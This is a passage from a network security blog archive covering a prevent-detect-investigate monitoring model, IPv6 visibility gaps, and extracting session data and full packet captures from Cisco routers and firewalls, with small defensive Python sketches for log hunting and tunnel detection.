Archive for the General Security Category

I love it when a plan comes together

Posted in General Security, NSM on 9 January, 2014 by Alec Waters

As defenders, we have many reasons to do our jobs. We want to comply with regulations, protect our employers (and protect our pay cheques!), and just maybe we enjoy the challenge despite the certain knowledge that someday an exploit with our name on it is going to smack us between the eyes.

The “why we do it” is therefore straightforward; what about the “how”? How do we defend? I don’t mean from a technical perspective – at a generic level, what are we trying to achieve?

There are certainly many answers to that question, but I quite like the idea that there are three mutually supporting objectives for defenders. The idea I’m presenting below is probably a little monitoring-centric, but then so am I!

At the top tier, there’s the “Defenders’ Utopia”, namely Prevent-It:

It doesn’t matter what “It” is – if we can prevent all badness, we’ve won! Let’s patch stuff, pentest stuff, educate our users, harden our deployments, use SDL principles and products X, Y and Z to prevent all the badness, guaranteeing us “corporate security hero” status.

Prevent-It is therefore our “Plan A”. Sadly, it’s not enough because Prevention Eventually Fails – we need a Plan B.

If we can’t Prevent-It, Plan B should be to “Detect-It” in a timely fashion:

And no, third-party breach notification doesn’t count as “timely”! As well as responding to obvious indicators such as AV or IDS hits, we need to be proactive in detection by hunting through all of the instrumentation at our disposal looking for indicators like uncommon or never-before-seen events, unusual volumes of network traffic or event types, Bob logging in from Antigua when you know he’s in Scotland, etc. A solid ability to Detect-It will help you invoke the Intruder’s Dilemma.
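To make the “never-before-seen” idea concrete, here’s a minimal Python sketch of the hunting approach – the file names and the one-event-ID-per-line format are assumptions for the example, not a prescription:

# Hedged sketch: flag event types we've never seen before.
# Assumes one event ID per line in each file - adapt to your own log format.

def load_ids(path):
    with open(path) as f:
        return {line.strip() for line in f if line.strip()}

baseline = load_ids("baseline_event_ids.txt")   # everything seen historically
today = load_ids("todays_event_ids.txt")        # extracted from today's logs

for event_id in sorted(today - baseline):
    print("Never seen before:", event_id)

# Once reviewed, fold today's IDs into the baseline for tomorrow's hunt
with open("baseline_event_ids.txt", "a") as f:
    for event_id in sorted(today - baseline):
        f.write(event_id + "\n")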

“Detect-It” is bigger than “Prevent-It” in the diagram because prevention is hard, and we are more likely to be able to detect things than we are to prevent them if we try hard enough. Attackers have more tactics at their disposal than defenders have preventative measures so you need to be as thorough and as business-tailored as you can be in your monitoring. Know your infrastructure in as much detail as possible in terms of the platform (e.g., MVC app on IIS8 behind a Cisco ASA) and make certain it’s behaving as expected. For a self-contained security team, this latter part might be hard – I’d possibly venture the opinion that an app’s functional spec might be a useful thing for the security team to have. Should app X be sending emails? Doing FTP transfers? Talking to SkyDrive? If the security team don’t understand these details, they may miss things.

Eventually, you’ll likely run up against an attacker who slips past detection and conjures up the defenders’ nightmare of third-party breach notification – you’ve been compromised, you didn’t notice it happen, and now you’re front page news. Plan B has failed – your final recourse is Plan C:


If we can’t Prevent-It, and we didn’t Detect-It then we have to maintain the ability to Investigate-It. This bit’s biggest because it represents your gathering of logs, network traffic data and other indicators – your monumental programme of “hay collection” (the Detect-It part can be thought of as a “hay removal” process whose output is needles, if you follow my metaphor).

Even boring, routine logs may be worth their weight in gold when Investigating-It – collect as much as is feasible and legal. Even if we don’t have the resource to actually look at all the collected logs as a matter of course, at least we’ve got a huge pool of evidence to trawl through as part of the Incident Response process.

We can also use Investigate-It for retrospective analysis. If a new set of IOCs (Indicators of Compromise) comes to light, we can check them against what we’ve collected so far. Investigate-It also supports your corporate forensic readiness plan – knowing what information you need as part of IR, where to get it, and what you can get quickly without outside help is key.
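As an illustration only, a retrospective sweep of archived flat-file logs for a newly published set of IOCs might look something like the sketch below; the iocs.txt file (one indicator per line) and the logs directory are assumptions made for the example:

# Hedged sketch: sweep archived logs for newly published IOCs (IPs, domains, hashes).
import os

with open("iocs.txt") as f:
    iocs = [line.strip() for line in f if line.strip()]

for root, _, files in os.walk("logs"):
    for name in files:
        path = os.path.join(root, name)
        with open(path, errors="replace") as log:
            for lineno, line in enumerate(log, 1):
                for ioc in iocs:
                    if ioc in line:
                        print(f"{path}:{lineno}: hit on {ioc}")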

Stairway to Heaven

If our org has sufficient resources we can move back up the stack, leveraging each tier to improve the one above. If we have an excellent capability to Investigate-It, it means we can improve our ability to Detect-It by hunting through the collected logs in different ways, producing more insightful reports/alerts/dashboards that pull together many disparate log sources. Lessons learned as part of Investigate-It can be incorporated into Detect-It – make sure that the indicators that were missed this time won’t be missed next time.

Moving up again, improving our ability to Detect-It can improve our ability to Prevent-It because we may discover things we don’t like that we can put a stop to before they become a problem (e.g. people emailing confidential docs to their personal email account so they can “work on them from home”, people logging in as local admin, people running apps you don’t like, why is there an active Bluetooth serial port on the CEO’s MacBook, etc) or we may even discover Existing Badness that we can zap.

So now we’re back at the top of the diagram, hopefully in better stead than before we started. Like I say, it’s a monitoring-centric way of looking at things, but if you’re in the game hopefully it’s an interesting perspective!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Hacker Countermeasures, 1984 style

Posted in General Security, Retro on 30 April, 2012 by Alec Waters

Some number of years ago, I was lucky enough to get a Sinclair ZX-81 for Christmas. There was much wonderment and joy to be had amid the frustration of RAM-pack wobble, the agonising waits for software to load from tape, and the never-ending search for a replacement keyboard that wasn’t as bad (or worse) than the original.

The best thing about the computers of olde was the built-in interpreter, usually for BASIC – here was an item of consumer electronics that wouldn’t do a single thing unless you told it to, an unthinkable concept to the marketeers of today. Putting in a tape and typing LOAD “” was the easy way out of this predicament; however, the real solution to the inert nature of your newly purchased box of future was to open the manual and learn how to code.

So learn we did. One day, my father proudly showed me a program he’d written – a version of the card game “snap”, with graphics and everything. After whiling away a good part of the afternoon playing, I looked over the source code. Showing an early leaning towards white-box pentesting, I didn’t take long to find a simple flaw. By simply keeping your finger pressed on your “snap” key (regardless of the two cards on the top of the deck) you could beat even the quickest opponent when a true “snap” finally came around. If both players were aware of this exploit (or “expliot” as I’d almost certainly have spelled it at the time) you had to make sure that you were player 2, since the subroutine that checked which key was pressed during a “snap” condition checked for player 2’s “snap” key before player 1’s.

Easily exploitable vulnerabilities? Some things never change, huh? In terms of Incident Detection, prime Indicators of Compromise included my little sister complaining to our parents that Daddy’s game was no fun because Alec always won.

To restore the game back to a test of speedy reactions my father rolled out some countermeasures in the form of a patch. The next time we played, my tactic resulted in the computer labelling me a cheat and docking me five cards every time I pressed my snap key when it wasn’t snap. To further add injury to insult, the losing player was crushed by a one-ton weight falling from the ceiling. I’m sure you can imagine what a terrifying visual experience this must have been, especially if you remember the graphics capabilities of the ZX-81…

To sample the full glory of this dance of measure and countermeasure, here’s the actual source code as submitted to ZX Computing magazine nearly thirty years ago. Lines 570 and 580 show the horrifying corpses of the losing players, squashed flat by Newtonian Justice From Above. Enjoy :)


Lines 570 and 580, Newtonian Justice from Above


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Quick Book Review – The Alexandria Project, by Andrew Updegrove

Posted in General Security on 19 April, 2012 by Alec Waters

THANK YOU FOR YOUR CONTRIBUTION TO THE ALEXANDRIA PROJECT

In a slight departure from my usual reading material of John le Carré and non-fiction technical tomes, I recently read The Alexandria Project by Andrew Updegrove; it turned out to be a nice mix of the two.

Without wishing to spill too many beans, it’s a fun read featuring mystery attackers with mystery motives, three-letter-agencies butting heads whilst manipulating people down their chosen path, military coups and crazy politicians with their finger on the Big Red Button.

The plot is spookily close to reality, especially in the Big Red Button department – I was reading the story on the actual dates featured in the book, at which time events were playing out on the world stage much as they were in my Kindle (plot spoiler, courtesy of BBC News, here). Coincidence? Or does Mr Updegrove have a crystal ball?

For the grand total of £1.95, you can’t really go wrong. Swing by Amazon and pick up a copy!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Next Generation Naughtiness at the Dead Beef Cafe

Posted in General Security, IPv6, Networking, NSM on 23 December, 2010 by Alec Waters

The IPocalypse is nearly upon us. Amongst the FUD, the four horsemen are revving up their steeds, each bearing 32 bits of the IPv6 Global Multicast Address of Armageddon, ff0e::dead:beef:666.

Making sure that the four horsemen don’t bust into our stables undetected is something of a challenge at the moment; IPv6 can represent a definite network monitoring blind spot or, at worst, an unpoliced path right into the heart of your network. Consider the following:

Routers and Firewalls

Although a router may be capable of routing IPv6, are all the features you use on the router IPv6-enabled? Is the firewall process inspecting IPv6 traffic? If it is, is it as feature-rich as the IPv4 equivalent (e.g., does it support application-layer inspection for protocols like FTP, or HTTP protocol compliance checking?)

End hosts

If you IPv6-enable your infrastructure, you may be inadvertently assigning internal hosts global IPv6 addresses (2001::) via stateless address autoconfiguration. If this happens (deliberately or accidentally), are the hosts reachable from the Internet directly? There’s no safety blanket of NAT for internal hosts like there is in IPv4, and if your network and/or host firewalls aren’t configured for IPv6 you could be wide open.
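As a quick sanity check on an individual host, a sketch like this one (using the third-party psutil module, if it’s available to you) will list any global IPv6 addresses an interface has quietly acquired – treat it as an illustration rather than a tool:

# Hedged sketch: list non-link-local IPv6 addresses on this host.
# Requires the third-party psutil package (pip install psutil).
import socket
import psutil

for ifname, addrs in psutil.net_if_addrs().items():
    for addr in addrs:
        if addr.family == socket.AF_INET6:
            ip = addr.address.split("%")[0]   # strip any zone index
            if not ip.startswith("fe80") and ip != "::1":
                print(ifname + ": " + ip)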

IDS/IPS

Do your IDS/IPS boxes support IPv6? Snort’s had IPv6 support since (I think) v2.8; the Cisco IPS products are also IPv6-aware, as I’m sure are many others.

Session tracking tools

SANCP has no IPv6 support; Argus does, as does cxtracker. Netflow can also be configured to export IPv6 flows using v9 flow exports.

Reporting tools

Even if all of your all-seeing-eyes support IPv6, they’re of little use if your reporting tools don’t. Can your netflow analyser handle IPv6 exports? What about your IDS reporting tools – are they showing you alerts on IPv6 traffic? What about your expensive SIEM box?

The IPv6 Internet is just as rotten as the IPv4 one

We’ve seen some quite prolific IPv6 port scanning just as described here, complete with scans of addresses like 2001:x:x:x::c0:ffee and 2001:x:x:x::dead:beef:cafe. The same scanning host also targeted UDP/53 trying to resolve ‘localhost’, with the same source port (6689) being used for both TCP and UDP scans. I have no idea if this is reconnaissance or part of some kind of research project, but there were nearly 13000 attempts from this one host in the space of about three seconds.

Due to the current lack of visibility into IPv6, it can also make a great bearer of covert channels for an attacker or pentester. Even if you’re not running IPv6 at all, an attacker who gains a foothold within your network could easily set up a low-observable IPv6-over-IPv4 tunnel using one of the many IPv6 transition mechanisms available, such as 6in4 (uses IPv4 protocol 41) or Teredo (encapsulates IPv6 in UDP, and can increase the host’s attack surface by assigning globally routable IPv6 addresses to hosts behind NAT devices, which are otherwise mostly unreachable from the Internet).
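If you have packet captures to hand, a rough first pass for tunneled IPv6 might look like this scapy sketch – the pcap filename is an assumption, 6in4 is matched on IPv4 protocol 41, and Teredo is approximated simply as UDP port 3544:

# Hedged sketch: look for likely IPv6-in-IPv4 tunnels in an existing capture.
# Requires scapy (pip install scapy).
from scapy.all import rdpcap, IP, UDP

for pkt in rdpcap("traffic_audit.pcap"):
    if IP not in pkt:
        continue
    ip = pkt[IP]
    if ip.proto == 41:
        print("Possible 6in4 tunnel:", ip.src, "->", ip.dst)
    elif UDP in pkt and 3544 in (pkt[UDP].sport, pkt[UDP].dport):
        print("Possible Teredo traffic:", ip.src, "->", ip.dst)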

The IPocalypse is coming…

…that’s for certain; we just have to make sure we’re ready for it. Even if you’re not using IPv6 right now, you probably will be to some degree a little way down the road. Now’s the time to check the capability of your monitoring infrastructure, and to conduct a traffic audit looking for tunneled IPv6 traffic. Who knows what you might find!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part two – session data

Posted in Cisco, General Security, NSM on 26 October, 2010 by Alec Waters

In part one, I covered how to use Cisco routers and firewalls to perform full packet capture. This exciting installment will cover how to get network session data out of these devices.

Network session data can be likened to a real-world itemised telephone bill. It tells you who “called” who, at what times, for how long, and how much was said (but not what was said). It’s an excellent lightweight way to see what’s going on armed only with a command prompt.

There are several ways to extract such information from Cisco kit; we’ll look at each in turn, following Part One’s support/troubleshooting/IR scenario of accessing remote devices where you’re not able to make topological changes or install any extra software or hardware.

Netflow

The richest source of session information on Cisco devices is Netflow (I’ll leave it to Cisco to explain how to turn it on). If you’re able to set up a Netflow collector/analyser (like this one (free for two-interface routers), or many others) you can drill down into your session info as far as you like. If you haven’t got an analyser or you can’t install one in time of need, it’s still worth switching on Netflow because you can interrogate the flow cache from the command line.

The command is “show ip cache flow”, and the output is split into two parts. The first shows some statistical information about the flows that the router has observed:

router#sh ip cache flow
IP packet size distribution (3279685 total packets):
 1-32   64   96  128  160  192  224  256  288  320  352  384  416  448  480
 .000 .184 .182 .052 .072 .107 .004 .005 .000 .000 .000 .000 .000 .000 .000

 512  544  576 1024 1536 2048 2560 3072 3584 4096 4608
 .000 .000 .001 .020 .365 .000 .000 .000 .000 .000 .000

IP Flow Switching Cache, 278544 bytes
 57 active, 4039 inactive, 418030 added
 10157020 ager polls, 0 flow alloc failures
 Active flows timeout in 1 minutes
 Inactive flows timeout in 15 seconds
IP Sub Flow Cache, 34056 bytes
 57 active, 967 inactive, 418030 added, 418030 added to flow
 0 alloc failures, 0 force free
 1 chunk, 1 chunk added
 last clearing of statistics never
Protocol     Total    Flows   Packets Bytes  Packets Active(Sec) Idle(Sec)
--------     Flows     /Sec     /Flow  /Pkt     /Sec     /Flow     /Flow
TCP-WWW       6563      0.0       186  1319      1.2       4.7       1.4
TCP-other    16163      0.0         1    47      0.0       0.0      15.4
UDP-DNS         12      0.0         1    67      0.0       0.0      15.6
UDP-NTP       1010      0.0         1    76      0.0       0.0      15.0
UDP-Frag         2      0.0         6   710      0.0       0.2      15.3
UDP-other   316602      0.3         2   156      0.8       0.6      15.4
ICMP         31165      0.0         6    63      0.2      53.4       2.2
IP-other     46438      0.0        21   125      1.0      58.0       2.1
Total:      417955      0.4         7   574      3.3      11.0      12.7

In the absence of a graphical Netflow analyser, the Packets/Sec counter is a good barometer of what’s “using up all the bandwidth”. To clear the stats so that you can establish a baseline, you can use the command “clear ip flow stats”.

After the stats comes a listing of all the flows currently being tracked by the router:

SrcIf     SrcIPaddress    DstIf     DstIPaddress    Pr SrcP DstP  Pkts
Fa4       xxx.xxx.xxx.xxx Local     yyy.yyy.yyy.yyy 32 3FAF 037C    16
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
Tu100     10.7.1.250      BV3       10.4.1.3        06 0050 C0AC   120
BV3       10.4.1.3        Tu100     10.7.1.250      06 C0AC 0050   116
Tu100     192.168.88.20   Local     172.16.7.10     01 0000 0800     5
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
Fa4       bbb.bbb.bbb.bbb BV3       yyy.yyy.yyy.yyy 06 0050 C0A0     1
BV3       10.4.1.3        Fa4       ddd.ddd.ddd.ddd 06 C07E 0050     1
Tu100     192.168.88.56   Local     172.16.7.10     06 8081 0016     7
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763
Tu100     192.168.88.28   Local     172.16.7.10     11 04AC 00A1     1
Tu100     192.168.88.28   Local     172.16.7.10     11 04A6 00A1     1
Fa4       aaa.aaa.aaa.aaa Local     yyy.yyy.yyy.yyy 32 275F BD8A     5
Fa4       ccc.ccc.ccc.ccc Local     yyy.yyy.yyy.yyy 32 97F1 E9BE     5
Tu100     10.7.1.242      Local     172.16.7.10     01 0000 0000     3
Fa4       ddd.ddd.ddd.ddd BV3       yyy.yyy.yyy.yyy 06 0050 C07E     1

The tempting simplicity of the table above hides a plethora of gotchas for the unwary:

  • The Pr (IP protocol number), SrcP (source port) and DstP (destination port) columns are in hex, but we can all do the conversion in our heads, right? ;) (If not, there’s a quick decoding sketch just after this list.)
  • Netflow is a unidirectional technology. That means that if hosts A and B are talking to one another via a single TCP connection, two flows will be logged – one for A->B and one for B->A. For example, these two rows in the table above are talking about the same TCP session (the four-tuple of addresses and ports is the same for both rows):
Tu100     10.7.1.250      BV3       10.4.1.3        06 0051 C07A   663
BV3       10.4.1.3        Tu100     10.7.1.250      06 C07A 0051   366
  • Unless you configure it otherwise, Netflow is an ingress technology. This means that flows are accounted for as they enter the router, not as they leave. You can determine what happens on the egress side of things because when a flow is accounted for the output interface is determined by a FIB lookup and placed in the DstIf column; in this way, you can track a flow’s path through the router. I mention this explicitly because…
  • Netflow does not sit well with NAT. Take a look at these two rows, which represent an HTTP download (port 0x0050 is 80 in decimal) requested of non-local server zzz.zzz.zzz.zzz by client 10.4.1.3:
BV3       10.4.1.3        Fa4       zzz.zzz.zzz.zzz 06 C0A2 0050   429
Fa4       zzz.zzz.zzz.zzz BV3       yyy.yyy.yyy.yyy 06 0050 C0A2   763

So what’s yyy.yyy.yyy.yyy, then? It’s the NAT inside global address representing 10.4.1.3. As Netflow is unidirectional and is recorded as it enters an interface, the returning traffic from zzz.zzz.zzz.zzz will have the post-NAT yyy.yyy.yyy.yyy as its destination address, and will be recorded as such.

Provided that you keep that lot in mind, the flow cache is a powerful tool to explore the traffic your router is handling.
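And if mental hex arithmetic isn’t your thing, a couple of lines of Python will decode a flow row’s protocol and ports – the values below are lifted from one of the rows above:

# Hedged sketch: decode the hex Pr/SrcP/DstP columns from "show ip cache flow".
pr, srcp, dstp = "06", "0050", "C0A2"          # one of the flow rows above
protocols = {1: "ICMP", 6: "TCP", 17: "UDP"}   # the usual suspects

print(protocols.get(int(pr, 16), pr), int(srcp, 16), "->", int(dstp, 16))
# prints: TCP 80 -> 49314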

NAT translations

A typical border router may well perform NAT/PAT tasks. If so, you can use the NAT database as a source of session information. On a router, the command is “show ip nat translations [verbose]”; on a PIX/ASA, it’s “show xlate [debug]”:

router#show ip nat translations
Pro Inside global         Inside local   Outside local    Outside global
tcp yyy.yyy.yyy.yyy:49314 10.4.1.3:49314 94.42.37.14:80   94.42.37.14:80
tcp yyy.yyy.yyy.yyy:49316 10.4.1.3:49316 92.123.68.49:80  92.123.68.49:80

If you’ve got a worm on your network that’s desperately trying to spread, chances are you’ll see a ton of NAT translations (which could overwhelm a small router). Rather than paging through thousands of lines of output, you can just ask the device for some NAT statistics. On a router, it’s “show ip nat statistics”; on a PIX/ASA, it’s “show xlate count”.

Keeping tabs on the number of active NAT translations is a worthwhile thing to do. I wrote a story for Security Monkey’s blog a while back which tells the tale of a worm exhausting a router’s memory with NAT translations; you can even graph the number of translations to look for anomalies over time.
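As an illustration of the “graph it over time” idea (a sketch, not a supported tool), something like the following could be scheduled to build a CSV of translation counts; it assumes the third-party netmiko library, an IOS device and suitable read-only credentials, and the output parsing may need adjusting for your platform:

# Hedged sketch: record the router's active NAT translation count over time.
import csv
import re
import time
from netmiko import ConnectHandler   # pip install netmiko

router = ConnectHandler(device_type="cisco_ios", host="192.0.2.1",
                        username="monitor", password="********")
output = router.send_command("show ip nat statistics")
router.disconnect()

match = re.search(r"Total active translations:\s+(\d+)", output)
count = int(match.group(1)) if match else 0

with open("nat_translations.csv", "a", newline="") as f:
    csv.writer(f).writerow([time.strftime("%Y-%m-%d %H:%M:%S"), count])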

Firewall sessions

Another way of extracting session information is to ask the router or PIX about the sessions it is currently tracking for firewall purposes. On a router it’s “show ip inspect sessions [detail]”; on the PIX/ASA, it’s “show conn [detail]”.

router#show ip inspect sessions detail
Established Sessions
 Session 842064A4 (10.4.1.3:49446)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:58
  Bytes sent (initiator:responder) [440:4269]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49446:49446] on ACL outside-fw (6 matches)
 Session 84206FC4 (10.4.1.3:49443)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:00:59, Last heard 00:00:59
  Bytes sent (initiator:responder) [440:2121]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49443:49443] on ACL outside-fw (4 matches)
 Session 8420728C (10.4.1.3:49436)=>(92.123.68.81:80) http SIS_OPEN
  Created 00:01:01, Last heard 00:00:50
  Bytes sent (initiator:responder) [1343:48649]
  In  SID 92.123.68.81[80:80]=>y.y.y.y[49436:49436] on ACL outside-fw (44 matches)

This has the advantage of not being complicated by NAT, but still showing useful bytecounts and session durations.

Last resorts

If none of the above can help you out, there are a couple of last resort options open to you. The first of these is the “ip accounting” interface configuration command on IOS routers. To quote Cisco:

The ip accounting command records the number of bytes (IP header and data) and packets switched through the system on a source and destination IP address basis. Only transit IP traffic is measured and only on an outbound basis; traffic generated by the router access server or terminating in this device is not included in the accounting statistics. Traffic coming from a remote site and transiting through a router is also recorded.

Also note that this command will likely have a performance impact on the router. You may end up causing more problems than you solve by using this! The output of “show ip accounting” will look something like this:

router# show ip accounting
 Source          Destination            Packets      Bytes
 172.16.19.40    192.168.67.20          7            306
 172.16.13.55    192.168.67.20          67           2749
 172.16.2.50     192.168.33.51          17           1111
 172.16.2.50     172.31.2.1             5            319
 172.16.2.50     172.31.1.2             463          30991
 172.16.19.40    172.16.2.1             4            262

If “ip accounting” was a last resort, “debug ip packet” is what you’d use as an even lasterer resort, so much so that I leave it as an exercise for the reader to find out all about it. Don’t blame me when your router chokes to the extent that you can’t even enter “undebug all”…!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

The Cisco Kid and the Great Packet Roundup, part one

Posted in Cisco, General Security, NSM on 11 August, 2010 by Alec Waters

Knowing what your network is doing is central to the NSM doctrine, and the usual method of collecting NSM data is to attach a sensor of some kind to a tap or a span port on a switch.

But what if you can’t do this? What if you need to see what’s going on on a network that’s geographically remote and/or unprepared for conventional layer-2 capture? Quite a bit, as it turns out.

In the first of a two-part post, the Cisco Kid (i.e., me) is going to walk you through a number of ways to use an IOS router or ASA/PIX firewall to perform full packet capture. The two product sets have different capabilities and limitations, so we’ll look at each in turn.

PIX/ASA

Full packet capture has been supported on these devices for many years, and it’s quite simple to operate. Step one is to create an ACL that defines the traffic we’re interested in capturing – because all of the captures are stored in memory, we need to be as specific as we can otherwise we’ll be using scarce RAM to capture stuff we don’t care about.

Let’s assume we’re interested in POP3 traffic. Start by defining an ACL like this:

pix(config)# access-list temp-pop3-acl permit tcp any eq 110 any
pix(config)# access-list temp-pop3-acl permit tcp any any eq 110

Note that we’ve specified port 110 as the source or the destination – we wouldn’t want to risk only capturing one side of the conversation.

Now we can fire up the capture, part of which involves specifying the size of the capture buffer. Remembering that this will live in main memory, we’d better have a quick check to see how much is going spare:

pix# show memory
Free memory:        31958528 bytes (34%)
Used memory:        60876368 bytes (66%)
Total memory:       92834896 bytes (100%)

Plenty, in this case. Let’s start the capture:

pix# capture temp-pop3-cap access-list temp-pop3-acl buffer 1024000 packet-length 1514 interface outside-if circular-buffer

This command gives us a capture called temp-pop3-cap, filtered using our ACL, stored in a one-meg (circular) memory buffer, that will capture frames of up to 1514 bytes in size from the interface called outside-if. If you don’t specify a packet-length, you won’t end up capturing entire frames.

Now we can check that we’re actually capturing stuff:

pix# show capture temp-pop3-cap
5 packets captured
1: 12:22:02.410440 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: S 3534424301:3534424301(0) win 65535 <mss 1260,nop,nop,sackOK>
2: 12:22:02.411401 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: S 621655548:621655548(0) ack 3534424302 win 16384 <mss 1380,nop,nop,sackOK>
3: 12:22:02.424691 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: . ack 621655549 win 65535
4: 12:22:02.425515 yyy.yyy.yyy.yyy.110 > xxx.xxx.xxx.xxx.39032: P 621655549:621655604(55) ack 3534424302 win 65535
5: 12:22:02.437462 xxx.xxx.xxx.xxx.39032 > yyy.yyy.yyy.yyy.110: P 3534424302:3534424308(6) ack 621655604 win 65480

To get the capture off the box and into Wireshark, point your web browser at the PIX/ASA like this, specifying the capture’s name in the URL:

https://yourpix/admin/capture/temp-pop3-cap/pcap

Don’t forget the /pcap on the end, or you’ll end up downloading only the output of the ‘show capture temp-pop3-cap’ command.

To clean up, you can use the ‘clear capture’ command to empty the capture buffer (but still keep on capturing) and the ‘no capture’ command to destroy the buffer and stop capturing altogether.

Provided one is careful with the size of the capture buffer, it’s nice and easy, it works, and it’s quick to implement in an emergency. If you’re using the ASDM GUI, Cisco have a how-to here that will walk you through the process.

IOS routers

As we’ll see, things aren’t quite as nice in IOS land, but there’s still useful stuff we can do. As of 12.4(20)T, IOS supports the Embedded Packet Capture feature (EPC) which at first glance seems to be equivalent to the PIX/ASA’s capture feature. Again, we’ll start by creating an ACL for capturing POP3 traffic:

router(config)#ip access-list extended temp-pop3-acl
router(config-ext-nacl)#permit tcp any eq 110 any
router(config-ext-nacl)#permit tcp any any eq 110

Now we can set up the capture. This involves two steps, setting up a capture buffer (where to store the capture) and a capture point (where to capture from). The capture buffer is set up like this:

router#monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular

Here is where Cisco seem to have missed a trick. The ‘size’ parameter refers to the buffer size in kilobytes, and 512 is the maximum. That’s “Why???” #1 – 512KB seems like a very low limit to place on a capture buffer. “Why???” #2 is the ‘max-size’ parameter, which refers to the number of bytes of each frame that will be captured; 1024 is the maximum, well below Ethernet’s 1500-byte MTU. So we seem to be limited to capturing a small number of truncated frames, which isn’t really in the spirit of “full” packet capture…

Sighing deeply, we move on to setting up the buffer’s filter using our ACL:

router#monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

Next, we create a capture point. This specifies where the frames will be captured, both from an interface and an IOS architecture point of view:

router#monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

‘ip cef’ means we’re interested in capturing CEF-switched frames as opposed to process-switched ones, so if traffic you’re expecting to see in the buffer isn’t there it could be that the router process switched it thus avoiding the capture point. The capture interface is specified, as is ‘both’ which means we’re interested in ingress and egress traffic.

Next (we’re almost there) we have to associate a buffer with a capture point:

router#monitor capture point associate temp-pop3-point temp-pop3-buffer

Now we can check our work before we start the capture:

router#show monitor capture buffer temp-pop3-buffer parameters
Capture buffer temp-pop3-buffer (circular buffer)
Buffer Size : 524288 bytes, Max Element Size : 1024 bytes, Packets : 0
Allow-nth-pak : 0, Duration : 0 (seconds), Max packets : 0, pps : 0
Associated Capture Points:
Name : temp-pop3-point, Status : Inactive
Configuration:
monitor capture buffer temp-pop3-buffer size 512 max-size 1024 circular
monitor capture point associate temp-pop3-point temp-pop3-buffer
monitor capture buffer temp-pop3-buffer filter access-list temp-pop3-acl

router#sh monitor capture point temp-pop3-point
Status Information for Capture Point temp-pop3-point
IPv4 CEF
Switch Path: IPv4 CEF            , Capture Buffer: temp-pop3-buffer
Status : Inactive
Configuration:
monitor capture point ip cef temp-pop3-point GigabitEthernet0/0.2 both

Start the capture:

router#monitor capture point start temp-pop3-point

And make sure we’re capturing stuff:

router#show monitor capture buffer temp-pop3-buffer dump
<frame by frame raw dump snipped>

When we’re done, we can stop the capture:

router#monitor capture point stop temp-pop3-point

And finally, we can export it off the box for analysis:

router#monitor capture buffer temp-pop3-buffer export tftp://10.1.8.6/temp-pop3.pcap

…and for all that work, we’ve ended up with a tiny pcap containing truncated frames. Better than nothing though!

However, there is a second option for IOS devices, provided that you have a capture workstation that’s on a directly attached ethernet subnet. It’s called Router IP Traffic Export (RITE), and will copy nominated packets and send them off-box to a workstation running Wireshark or similar (or an IDS, etc.). Captures therefore do not end up in a memory buffer, and it is the responsibility of the workstation to capture the exported packets and to work out which packets were actually exported from the router and which are those sent or received by the workstation itself.

After carefully reading the restrictions and caveats in the documentation, we can start by setting up a RITE profile. This defines what we’re going to monitor, and where we’re going to export the copied packets:

router#ip traffic-export profile temp-pop3-profile
# Set the capture filter
router(conf-rite)#incoming access-list temp-pop3-acl
router(conf-rite)#outgoing access-list temp-pop3-acl
# Specify that we want to capture ingress and egress traffic
router(conf-rite)#bidirectional
# The capture workstation lives on the subnet attached to Gi0/0.2
router(conf-rite)#interface GigabitEthernet 0/0.2
# And the workstation’s MAC address is:
router(conf-rite)#mac-address hhhh.hhhh.hhhh

Finally, we apply the profile to the interface from which we actually want to capture packets:

router(config)#interface GigabitEthernet 0/0.2
router(config-subif)#ip traffic-export apply temp-pop3-profile

If all’s gone well, the capture workstation on hhhh.hhhh.hhhh should start seeing a flow of POP3 traffic. We can ask the router how it’s getting on, too:

router#show ip traffic-export
Router IP Traffic Export Parameters
Monitored Interface         GigabitEthernet0/0
Export Interface                GigabitEthernet0/0.2
Destination MAC address hhhh.hhhh.hhhh
bi-directional traffic export is on
Output IP Traffic Export Information    Packets/Bytes Exported    19/1134

Packets Dropped           17877
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Input IP Traffic Export Information     Packets/Bytes Exported    27/1169

Packets Dropped           12153
Sampling Rate                one-in-every 1 packets
Access List                      temp-pop3-acl [named extended IP]

Profile temp-pop3-profile is Active

You get full packets captured (note packets, not frames – the encapsulating Ethernet frame isn’t the same as the original, in that it has the router’s MAC address as the source and the capture workstation’s MAC address as the destination), and provided you’re local to the router and can afford the potential performance hit on the box, it’s quite a neat way to perform an inline capture. Furthermore, this may be your only capturing option sometimes – granted, the capture workstation has to be on a local ethernet segment, but the traffic profile itself can be applied to other kinds of circuit for which you may not have a tap (ATM, synchronous serial, etc.). It’s a very useful tool.
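Since the exported copies arrive with the router’s MAC address as the source and the workstation’s as the destination, the sorting-out job on the workstation can be done after the fact with something like this scapy sketch – the MAC addresses and filename are placeholders:

# Hedged sketch: pull the RITE-exported frames out of a capture taken on the workstation.
from scapy.all import rdpcap, wrpcap, Ether   # pip install scapy

ROUTER_MAC = "00:11:22:33:44:55"       # placeholder - the router's MAC
WORKSTATION_MAC = "66:77:88:99:aa:bb"  # placeholder - the hhhh.hhhh.hhhh address above

exported = [p for p in rdpcap("workstation_capture.pcap")
            if Ether in p
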